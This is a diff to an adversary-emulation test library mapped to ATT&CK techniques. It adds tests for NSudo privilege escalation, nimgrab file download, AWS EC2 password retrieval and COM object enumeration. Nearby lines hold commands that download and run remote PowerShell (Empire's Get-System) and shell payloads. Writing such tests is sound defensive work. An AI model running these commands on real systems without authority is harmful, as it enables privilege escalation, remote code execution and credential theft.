 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Unsecured Credentials](../../T1552/T1552.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Login Hook](../../T1037.002/T1037.002.md) | [Trap](../../T1546.005/T1546.005.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -26,7 +26,7 @@
 |  | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Container Administration Command](../../T1609/T1609.md) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Video Capture](../../T1125/T1125.md) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
+|  | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 |  | [Launchctl](../../T1569.001/T1569.001.md) | [Cron](../../T1053.003/T1053.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |

atomics/Indexes/index.yaml

@@ -10937,7 +10937,6 @@ defense-evasion:
       executor:
         command: |
           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:"$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" "PathToAtomicsFolder\T1574.008\bin\calc.cs"
-          Copy-Item "PathToAtomicsFolder\T1574.008\bin\Calc.exe" -Destination "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe"
           Powershell -noprofile
         cleanup_command: |
           Remove-Item "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" -ErrorAction Ignore
@@ -15274,6 +15273,37 @@ defense-evasion:
           IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
         name: powershell
         elevation_required: true
+    - name: Launch NSudo Executable
+      auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
+      description: |-
+        Launches the NSudo executable for a short period of time and then exits.
+        NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
+      supported_platforms:
+      - windows
+      input_arguments:
+        nsudo_path:
+          description: Path to the NSudo bat file
+          type: Path
+          default: "$env:TEMP\\NSudo_8.2_All_Components\\NSudo_Launcher\\x64\\NSudoLG.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'NSudo.bat must exist in the specified path #{nsudo_path}
+
+          '
+        prereq_command: 'if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+          Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
+          Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
+          Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+      executor:
+        command: |
+          Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
+          Start-Sleep -Second 5
+          Stop-Process -Name "cmd" -force -erroraction silentlycontinue
+        name: powershell
   T1205.001:
     technique:
       x_mitre_platforms:
@@ -31964,7 +31994,6 @@ privilege-escalation:
       executor:
         command: |
           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:"$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" "PathToAtomicsFolder\T1574.008\bin\calc.cs"
-          Copy-Item "PathToAtomicsFolder\T1574.008\bin\Calc.exe" -Destination "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe"
           Powershell -noprofile
         cleanup_command: |
           Remove-Item "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" -ErrorAction Ignore
@@ -34604,6 +34633,37 @@ privilege-escalation:
           IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
         name: powershell
         elevation_required: true
+    - name: Launch NSudo Executable
+      auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
+      description: |-
+        Launches the NSudo executable for a short period of time and then exits.
+        NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
+      supported_platforms:
+      - windows
+      input_arguments:
+        nsudo_path:
+          description: Path to the NSudo bat file
+          type: Path
+          default: "$env:TEMP\\NSudo_8.2_All_Components\\NSudo_Launcher\\x64\\NSudoLG.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'NSudo.bat must exist in the specified path #{nsudo_path}
+
+          '
+        prereq_command: 'if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+          Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
+          Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
+          Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+      executor:
+        command: |
+          Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
+          Start-Sleep -Second 5
+          Stop-Process -Name "cmd" -force -erroraction silentlycontinue
+        name: powershell
   T1134.003:
     technique:
       x_mitre_platforms:
@@ -52804,7 +52864,6 @@ persistence:
       executor:
         command: |
           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:"$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" "PathToAtomicsFolder\T1574.008\bin\calc.cs"
-          Copy-Item "PathToAtomicsFolder\T1574.008\bin\Calc.exe" -Destination "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe"
           Powershell -noprofile
         cleanup_command: |
           Remove-Item "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" -ErrorAction Ignore
@@ -73890,7 +73949,73 @@ credential-access:
       - User
       - Administrator
       - SYSTEM
-    atomic_tests: []
+      identifier: T1552
+    atomic_tests:
+    - name: AWS - Retrieve EC2 Password Data using stratus
+      auto_generated_guid: a21118de-b11e-4ebd-b655-42f11142df0c
+      description: 'This atomic runs an API call GetPasswordData from a role that
+        does not have permission to do so. This simulates an attacker attempting to
+        retrieve RDP passwords on a high number of Windows EC2 instances. This atomic
+        test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team).
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: Path
+          default: "$PathToAtomicsFolder/T1552/src"
+        aws_region:
+          description: AWS region to detonate
+          type: String
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if [ -f #{stratus_path}/stratus ]; then exit 0; else exit
+          1; fi;
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" == \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep Darwin_x86_64 | cut -d '\"' -f 4); wget
+          -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n  tar
+          -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" == \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep linux_x86_64 | cut -d '\"' -f 4) \n  wget
+          -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n  tar
+          -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi\n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+          '
+      executor:
+        command: "export AWS_REGION=#{aws_region} \ncd #{stratus_path}\necho \"starting
+          warmup\"\n./stratus warmup aws.credential-access.ec2-get-password-data\necho
+          \"starting detonate\"\n./stratus detonate aws.credential-access.ec2-get-password-data
+          --force\n"
+        cleanup_command: |
+          export AWS_REGION=#{aws_region}
+
+          echo "Cleanup detonation"
+          cd #{stratus_path}
+          ./stratus cleanup --all
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
   T1139:
     technique:
       x_mitre_platforms:
@@ -92498,6 +92623,46 @@ command-and-control:
 
           '
         name: sh
+    - name: Nimgrab - Transfer Files
+      auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e
+      description: "Use nimgrab.exe to download a file from the web. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_file:
+          description: URL of file to copy
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
+        local_path:
+          description: Local path to place file
+          type: Path
+          default: Atomic-license.txt
+        destination_path:
+          description: Destination path to file
+          type: Path
+          default: "$env:TEMP\\Atomic-license.txt"
+      executor:
+        command: 'cmd /c nimgrab.exe #{remote_file} #{local_path}
+
+          '
+        cleanup_command: 'del #{local_path} >nul 2>&1
+
+          '
+        name: command_prompt
+      dependencies:
+      - description: 'NimGrab must be installed on system.
+
+          '
+        prereq_command: 'if (Test-Path "$env:temp\nimgrab.exe") {exit 0} else {exit
+          1}
+
+          '
+        get_prereq_command: |
+          Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip
+          Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim
+          Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{destination_path}
+          Remove-Item $env:temp\nim
+          Remove-Item $env:temp\nim.zip
   T1001.002:
     technique:
       x_mitre_platforms:
@@ -94296,7 +94461,35 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-    atomic_tests: []
+      identifier: T1592.002
+    atomic_tests:
+    - name: Enumerate COM Objects with Powershell
+      auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
+      description: "This test is designed to enumerate the COM objects listed in HKCR,
+        then output their methods and CLSIDs to a text file.\nAn adversary could then
+        use this information to identify COM objects that might be vulnerable to abuse,
+        such as using them to spawn arbitrary processes. \nSee: https://www.mandiant.com/resources/hunting-com-objects"
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_file:
+          description: File to output list of COM objects to
+          type: String
+          default: "$env:temp\\T1592.002Test1.txt"
+      executor:
+        command: |
+          New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
+          Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > $env:temp\clsids.txt
+          ForEach($CLSID in Get-Content "$env:temp\clsids.txt")
+          {try{write-output "$($Position)-$($CLSID)"
+          write-output "------------"| out-file #{output_file} -append
+          write-output $($CLSID)| out-file #{output_file} -append
+          $handle=[activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))
+          $handle | get-member -erroraction silentlycontinue | out-file #{output_file} -append
+          $position += 1} catch{}}
+        cleanup_command: "remove-item #{output_file} -force -erroraction silentlycontinue\nremove-item
+          $env:temp\\clsids.txt -force -erroraction silentlycontinue      \n"
+        name: powershell
   T1593.001:
     technique:
       x_mitre_platforms:

atomics/T1105/T1105.md

@@ -62,6 +62,8 @@ On Windows, adversaries may use various utilities to download tools, such as `co
 
 - [Atomic Test #27 - Linux Download File and Run](#atomic-test-27---linux-download-file-and-run)
 
+- [Atomic Test #28 - Nimgrab - Transfer Files](#atomic-test-28---nimgrab---transfer-files)
+
 
 <br/>
 
@@ -1211,4 +1213,59 @@ del #{payload_name}
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #28 - Nimgrab - Transfer Files
+Use nimgrab.exe to download a file from the web.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b1729c57-9384-4d1c-9b99-9b220afb384e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
+| local_path | Local path to place file | Path | Atomic-license.txt|
+| destination_path | Destination path to file | Path | $env:TEMP&#92;Atomic-license.txt|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+cmd /c nimgrab.exe #{remote_file} #{local_path}
+```
+
+#### Cleanup Commands:
+```cmd
+del #{local_path} >nul 2>&1
+```
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: NimGrab must be installed on system.
+##### Check Prereq Commands:
+```cmd
+if (Test-Path "$env:temp\nimgrab.exe") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```cmd
+Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip
+Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim
+Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{destination_path}
+Remove-Item $env:temp\nim
+Remove-Item $env:temp\nim.zip
+```
+
+
+
+
 <br/>

atomics/T1105/T1105.yaml

@@ -735,4 +735,41 @@ atomic_tests:
       curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
     cleanup_command: |
       del #{payload_name}
-    name: sh
+    name: sh
+- name: Nimgrab - Transfer Files
+  auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e
+  description: |
+    Use nimgrab.exe to download a file from the web. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    remote_file:
+      description: URL of file to copy
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
+    local_path:
+      description: Local path to place file
+      type: Path
+      default: Atomic-license.txt
+    destination_path:
+      description: Destination path to file
+      type: Path
+      default: $env:TEMP\Atomic-license.txt
+  executor:
+    command: |
+      cmd /c nimgrab.exe #{remote_file} #{local_path}
+    cleanup_command: |
+      del #{local_path} >nul 2>&1
+    name: command_prompt
+  dependencies: 
+    - description: |
+        NimGrab must be installed on system.
+      prereq_command: |
+        if (Test-Path "$env:temp\nimgrab.exe") {exit 0} else {exit 1}
+      get_prereq_command: |
+        Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip
+        Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim
+        Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{destination_path}
+        Remove-Item $env:temp\nim
+        Remove-Item $env:temp\nim.zip
+ 

atomics/T1134.001/T1134.001.md

@@ -10,6 +10,8 @@ An adversary may do this when they have a specific, existing process they want t
 
 - [Atomic Test #2 - `SeDebugPrivilege` token duplication](#atomic-test-2---sedebugprivilege-token-duplication)
 
+- [Atomic Test #3 - Launch NSudo Executable](#atomic-test-3---launch-nsudo-executable)
+
 
 <br/>
 
@@ -72,4 +74,55 @@ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Launch NSudo Executable
+Launches the NSudo executable for a short period of time and then exits.
+NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| nsudo_path | Path to the NSudo bat file | Path | $env:TEMP&#92;NSudo_8.2_All_Components&#92;NSudo_Launcher&#92;x64&#92;NSudoLG.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
+Start-Sleep -Second 5
+Stop-Process -Name "cmd" -force -erroraction silentlycontinue
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: NSudo.bat must exist in the specified path #{nsudo_path}
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
